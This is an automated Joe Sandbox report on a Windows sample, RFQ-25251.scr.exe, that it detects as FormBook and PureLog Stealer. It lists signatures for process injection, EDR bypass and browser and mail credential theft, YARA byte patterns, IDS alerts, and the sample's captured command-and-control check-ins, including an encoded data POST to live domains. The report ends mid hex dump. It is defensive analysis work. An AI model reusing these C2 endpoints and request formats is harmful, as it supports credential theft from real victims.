Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ-25251.scr.exe

Overview

General Information

Sample name:RFQ-25251.scr.exe
Analysis ID:1441277
MD5:46c4b29ec6111cebfa1bbd60074c3103
SHA1:fb6d55a4b03b0a0be4fa8ec340e1ddfb2e9d813d
SHA256:752b21ce0ebfdc831bc7348db4fdc8a8e15bd67ffb1ed3b60332513a35bb27aa
Tags:exe
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • RFQ-25251.scr.exe (PID: 7676 cmdline: "C:\Users\user\Desktop\RFQ-25251.scr.exe" MD5: 46C4B29EC6111CEBFA1BBD60074C3103)
    • RFQ-25251.scr.exe (PID: 7916 cmdline: "C:\Users\user\Desktop\RFQ-25251.scr.exe" MD5: 46C4B29EC6111CEBFA1BBD60074C3103)
    • RFQ-25251.scr.exe (PID: 7936 cmdline: "C:\Users\user\Desktop\RFQ-25251.scr.exe" MD5: 46C4B29EC6111CEBFA1BBD60074C3103)
    • RFQ-25251.scr.exe (PID: 7944 cmdline: "C:\Users\user\Desktop\RFQ-25251.scr.exe" MD5: 46C4B29EC6111CEBFA1BBD60074C3103)
      • ZkvvIsytMpWTrpZoKvbY.exe (PID: 5884 cmdline: "C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • replace.exe (PID: 1704 cmdline: "C:\Windows\SysWOW64\replace.exe" MD5: A7F2E9DD9DE1396B1250F413DA2F6C08)
          • ZkvvIsytMpWTrpZoKvbY.exe (PID: 3464 cmdline: "C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1784 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.3727690758.00000000004A0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000F.00000002.3727690758.00000000004A0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a8f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13ebf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000000.00000002.1289692109.00000000078D0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      00000007.00000002.1577459503.00000000015D0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000007.00000002.1577459503.00000000015D0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x2a8f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x13ebf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        Click to see the 14 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.RFQ-25251.scr.exe.78d0000.6.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          0.2.RFQ-25251.scr.exe.78d0000.6.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            0.2.RFQ-25251.scr.exe.32221b4.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              7.2.RFQ-25251.scr.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                7.2.RFQ-25251.scr.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
                • 0x2dd83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
                • 0x17352:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
                Click to see the 3 entries

                Sigma Signatures

                No Sigma rule has matched

                Snort Signatures

                Timestamp:05/14/24-12:53:04.780850
                SID:2855465
                Source Port:49743
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/14/24-12:51:31.633445
                SID:2855465
                Source Port:49723
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/14/24-12:52:41.548527
                SID:2855465
                Source Port:49739
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/14/24-12:53:20.139090
                SID:2855465
                Source Port:49747
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/14/24-12:51:47.573829
                SID:2855465
                Source Port:49727
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/14/24-12:54:08.648319
                SID:2855465
                Source Port:49755
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/14/24-12:50:58.665024
                SID:2855465
                Source Port:49718
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/14/24-12:53:44.973245
                SID:2855465
                Source Port:49751
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/14/24-12:52:18.192090
                SID:2855465
                Source Port:49735
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.colchondealquiler.com/aleu/?Fb=heiUU9lLv45IJG5Wd6LJBmuSZbtDNHx122KPvL/NNDCzNkInOevyA08bejzsewnbLAKBPzZGyeY+skKwUgloo6X2S27Hq9j/bz05/C52hvbOe3CFZA==&Cvp=4jl0Z4R0OAvira URL Cloud: Label: malware
                Source: http://www.colchondealquiler.com/aleu/Avira URL Cloud: Label: malware
                Multi AV Scanner detection for domain / URL
                Source: www.onitsuka-ksa.comVirustotal: Detection: 13%Perma Link
                Multi AV Scanner detection for submitted file
                Source: RFQ-25251.scr.exeReversingLabs: Detection: 60%
                Source: RFQ-25251.scr.exeVirustotal: Detection: 37%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.RFQ-25251.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RFQ-25251.scr.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.3727690758.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1577459503.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3741723282.0000000005080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1573562634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.3739964575.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.3739911328.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3739750854.00000000028B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1578501671.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Machine Learning detection for sample
                Source: RFQ-25251.scr.exeJoe Sandbox ML: detected
                Source: RFQ-25251.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: RFQ-25251.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: replace.pdb source: RFQ-25251.scr.exe, 00000007.00000002.1574095588.0000000000D07000.00000004.00000020.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 0000000E.00000003.1512954292.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 0000000E.00000002.3730835081.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: replace.pdbGCTL source: RFQ-25251.scr.exe, 00000007.00000002.1574095588.0000000000D07000.00000004.00000020.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 0000000E.00000003.1512954292.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 0000000E.00000002.3730835081.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ZkvvIsytMpWTrpZoKvbY.exe, 0000000E.00000002.3734045168.000000000100E000.00000002.00000001.01000000.0000000D.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000000.1642862154.000000000100E000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: YviV.pdb source: RFQ-25251.scr.exe
                Source: Binary string: wntdll.pdbUGP source: RFQ-25251.scr.exe, 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 0000000F.00000003.1575889614.0000000002C94000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 0000000F.00000003.1573807130.0000000002AE8000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RFQ-25251.scr.exe, RFQ-25251.scr.exe, 00000007.00000002.1574658810.0000000001240000.00000040.00001000.00020000.00000000.sdmp, replace.exe, replace.exe, 0000000F.00000003.1575889614.0000000002C94000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 0000000F.00000003.1573807130.0000000002AE8000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: YviV.pdbSHA256 source: RFQ-25251.scr.exe
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_004BBC00 FindFirstFileW,FindNextFileW,FindClose,15_2_004BBC00
                Source: C:\Windows\SysWOW64\replace.exeCode function: 4x nop then xor eax, eax15_2_004A9460
                Source: C:\Windows\SysWOW64\replace.exeCode function: 4x nop then pop edi15_2_004B210D

                Networking

                barindex
                Snort IDS alert for network traffic
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49718 -> 79.98.25.1:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49723 -> 64.190.62.22:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49727 -> 217.76.128.34:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49735 -> 178.211.137.59:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49739 -> 203.161.46.103:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49743 -> 162.240.81.18:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49747 -> 103.93.125.69:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49751 -> 3.125.172.46:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49755 -> 91.195.240.19:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.www60270.xyz
                Source: Joe Sandbox ViewIP Address: 162.240.81.18 162.240.81.18
                Source: Joe Sandbox ViewIP Address: 103.93.125.69 103.93.125.69
                Source: Joe Sandbox ViewIP Address: 79.98.25.1 79.98.25.1
                Source: Joe Sandbox ViewIP Address: 79.98.25.1 79.98.25.1
                Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                Source: Joe Sandbox ViewASN Name: DNC-ASDimensionNetworkCommunicationLimitedHK DNC-ASDimensionNetworkCommunicationLimitedHK
                Source: Joe Sandbox ViewASN Name: RACKRAYUABRakrejusLT RACKRAYUABRakrejusLT
                Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /aleu/?Fb=ok/gmcxpcerYYESWh7Vklw9Bm7swo7gbVWXcVokfXup7b9fdD39fjj06OXsQXJEXHKhiFziBALjD8i0StjfBZ6tcFTr4k1D73FrQqb2KesrNG9gusQ==&Cvp=4jl0Z4R0O HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.maxiwalls.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /aleu/?Fb=jXFvQTK4oWsNW5HaVP0aKlBegUUeN16TTlZ8jbhw/9BHTw5yM7uncTfMOk5Q960TVKfivgiXqRpaWw5bUpeZmRruwwT7mrPw5MWe/TE7XFATw0m0gg==&Cvp=4jl0Z4R0O HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.paydayloans3.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /aleu/?Fb=heiUU9lLv45IJG5Wd6LJBmuSZbtDNHx122KPvL/NNDCzNkInOevyA08bejzsewnbLAKBPzZGyeY+skKwUgloo6X2S27Hq9j/bz05/C52hvbOe3CFZA==&Cvp=4jl0Z4R0O HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.colchondealquiler.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /aleu/?Fb=N0v49flUUQfEWOo/aE7OdIaJv4xdfmBs7J9ivEb+Xo+Q/nq/YMDO//KjhQmhbqKlUVaao73nPs1gVWG10w4sM/a7W8oScpDHK4wfMzjdXHtYm8Gz2g==&Cvp=4jl0Z4R0O HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.skibinscy-finanse.plConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /aleu/?Fb=1EzsQVnX0vVrGxBYNXB1u7fNxljhjRHJWEXTYZCw6Y45y9QSTO9z6ggEQaWzMFMNeg7sTl3Zf11WKrZHAcHpW9hrZ8kUbuN4/rBR3ZymMyy6TdBz3A==&Cvp=4jl0Z4R0O HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.fairmarty.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /aleu/?Fb=mEhw182mTcvL4X7W6yJhLslIcG+j3Kkb/q8jOnfIToCvkLfDcLYfug01ytzddJhX/lijb8hpDT2F8KzL6RC5HrlDAC6es8J/4MGCSxvHU4H+D2Na9g==&Cvp=4jl0Z4R0O HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.aprovapapafox.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /aleu/?Fb=/mfxaTJBOgt3JDZkoxaXbiWRJO3cof11tbJm5eA1/p+8DdahBUuKuoWdPETp4wIg5O58ph7A0hS6+wjYiiGEsJ1bmNcNLMbEIClpI49SsaijuFrxzA==&Cvp=4jl0Z4R0O HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.83634.cnConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /aleu/?Fb=qJYbYwaLgLDJAMSHMJQaEOr73chNsD5VMq73qeoAA4dzyQoAh+hTVoh+ah/e183iVnKHGTOXkcX7G8t3YRyjWe/ogXVMOXyO4l4P9y/SnxDkYImARg==&Cvp=4jl0Z4R0O HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.valentinaetommaso.itConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /aleu/?Fb=Fsk+9Ugrf6MFs9mchnETM+3QD2cthhCQsqu2PahB1CBPiKPkA/hmNXSF9ivWSGs/4CiX0i2cy0l6l8SVSxzUE3Q4RMAOFSo2a4DyoUA+b+KE1mcO3A==&Cvp=4jl0Z4R0O HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.solesense.proConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.maxiwalls.com
                Source: global trafficDNS traffic detected: DNS query: www.choosejungmann.com
                Source: global trafficDNS traffic detected: DNS query: www.paydayloans3.shop
                Source: global trafficDNS traffic detected: DNS query: www.colchondealquiler.com
                Source: global trafficDNS traffic detected: DNS query: www.www60270.xyz
                Source: global trafficDNS traffic detected: DNS query: www.skibinscy-finanse.pl
                Source: global trafficDNS traffic detected: DNS query: www.avoshield.com
                Source: global trafficDNS traffic detected: DNS query: www.fairmarty.top
                Source: global trafficDNS traffic detected: DNS query: www.theertyuiergthjk.homes
                Source: global trafficDNS traffic detected: DNS query: www.aprovapapafox.com
                Source: global trafficDNS traffic detected: DNS query: www.83634.cn
                Source: global trafficDNS traffic detected: DNS query: www.polhi.lol
                Source: global trafficDNS traffic detected: DNS query: www.valentinaetommaso.it
                Source: global trafficDNS traffic detected: DNS query: www.toyzonetshirts.com
                Source: global trafficDNS traffic detected: DNS query: www.solesense.pro
                Source: global trafficDNS traffic detected: DNS query: www.onitsuka-ksa.com
                Source: unknownHTTP traffic detected: POST /aleu/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateHost: www.paydayloans3.shopOrigin: http://www.paydayloans3.shopContent-Type: application/x-www-form-urlencodedContent-Length: 191Cache-Control: max-age=0Connection: closeReferer: http://www.paydayloans3.shop/aleu/User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36Data Raw: 46 62 3d 75 56 74 50 54 6a 69 4f 39 6b 59 30 4a 72 62 59 4c 70 74 65 4c 56 6b 63 69 46 55 64 65 54 43 57 66 6e 5a 72 71 72 70 32 34 4e 74 30 66 54 46 47 4e 4c 66 55 64 32 6e 57 4a 56 73 59 37 4c 56 6d 53 59 33 67 32 41 57 4a 33 52 39 2b 45 6e 39 36 50 34 48 4c 77 42 33 4c 32 67 58 70 32 71 48 48 76 70 57 49 6b 52 55 59 51 45 51 70 70 47 2b 42 2f 51 73 47 70 37 79 30 46 57 77 4d 64 4b 68 34 45 2b 50 2b 6a 50 53 36 45 43 66 6c 4c 43 6f 45 35 2b 54 41 47 74 59 65 42 75 35 37 62 79 38 43 59 5a 64 43 64 74 62 6a 4d 78 7a 44 36 51 2f 41 4d 4e 33 36 58 4d 47 4b 34 73 6c 37 Data Ascii: Fb=uVtPTjiO9kY0JrbYLpteLVkciFUdeTCWfnZrqrp24Nt0fTFGNLfUd2nWJVsY7LVmSY3g2AWJ3R9+En96P4HLwB3L2gXp2qHHvpWIkRUYQEQppG+B/QsGp7y0FWwMdKh4E+P+jPS6ECflLCoE5+TAGtYeBu57by8CYZdCdtbjMxzD6Q/AMN36XMGK4sl7
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 May 2024 10:51:38 GMTServer: ApacheX-ServerIndex: llim603Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 65 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 61 6c 71 75 69 6c 65 72 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 24 52 45 47 49 53 54 52 41 4e 54 31 20 24 52 45 47 49 53 54 52 41 4e 54 32 20 24 52 45 47 49 53 54 52 41 4e 54 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 73 79 73 2e 65 73 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 73 65 67 75 69 6d 69 65 6e 74 6f 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 45 73 74 61 20 65 73 20 6c 61 20 70 26 61 61 63 75 74 65 3b 67 69 6e 61 20 64 65 3a 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 6
